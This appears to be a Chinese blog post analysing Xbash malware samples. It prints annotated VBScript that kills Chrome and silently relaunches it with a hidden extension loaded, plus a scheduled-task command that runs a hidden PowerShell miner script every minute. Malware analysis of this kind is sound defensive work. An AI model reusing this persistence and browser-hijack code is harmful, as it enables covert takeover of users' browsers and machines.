Xbash部分样本分析

Xbash部分样本分析

vb中注释是单引号 ' On Error ReSume Next: ' 这一句vb代码是异常处理，错误时会继续运行，不中断 strComputer = ".": Set OBjWMISeRvice = GETobject("winmgmts:\\"&StrComPuter&"\root\CIMV2"): ' set是用于给对象变量赋值 返回ActiveX对象 Set CoLiTems = ObjWmISErvice.ExeCquery("SELECT * FROM Win32_Process where name='chrome.exe' ",,48): 'ExeCquery是指关闭指定用户进程 SeT objShell = CreateObjeCt("WScript.Shell"): ' 创建WScript。sehll对象 starT = False: ' 遍历且与关键字对比 FOr Each ObjITem in colItEms: iF INstr(objitem.CommandLiNe,"silent-launch") > 1 ' vb中变量不区分大小写 字符串区分 thEn start = true: end if: NEXt: ' 关闭进程 function Killproc(strProcname): On ErroR REsume Next: Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"): Set arRProcesses = objWmIServiCe.ExEcQuery("select * from win32_process where Name ='"&strprocname&"'"): for Each Proccess In aRrpRocessEs: proccess.Terminate 0: ' terminate是指事件的终止 Next: ENd FuncTiOn: If nOT start then KillprOc("chrome.exe"): ' 杀死进程 Dim Instpath: ' 根据变量类型为变量分配内存空间 INstpaTh = objShell.Regread("HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\Path"): ' 读取注册表 appdataLocAtIon = objShell.ExpandENvironmenTStriNgs("%LOCALAPPDATA%"): ' 获取路径 C:\Users\xxx\AppData\Local chrome_locatIon = AppDataLoCaTion+"\chrome": ' 拼接路径 C:\Users\xxx\AppData\Local\chrome objShell.eXec(InsTPaTh+"\chrome.exe --load-extension="+chrome_locatIon+" --silent-launch --enable-automation"): ' --load-extension 每次重启chrome的快捷方式会被替换C:\Users\xxx\AppData\Local\chrome ' --silent-launch 表示不开启chrome，静默安装 ' --enable-automation 开启自动化 End if

SchTasks.exe /Create /SC MINUTE /TN "Update " /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $env:TMP\tmp.ps1" /MO 6 / 参数介绍： 1、/Create 创建新计划任务。 2、/TN taskname 指定唯一识别这个计划任务的名称 3、/ST starttime 指定运行任务的开始时间 /SC MINUTE （一分钟） 4、/TR taskrun 指定在这个计划时间运行的程序的路径 5、/MO modifier 改进计划类型以允许更好地控制计划重复 总结：一分钟运行一次tmp.ps1，也就是Function DllMiner函数

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。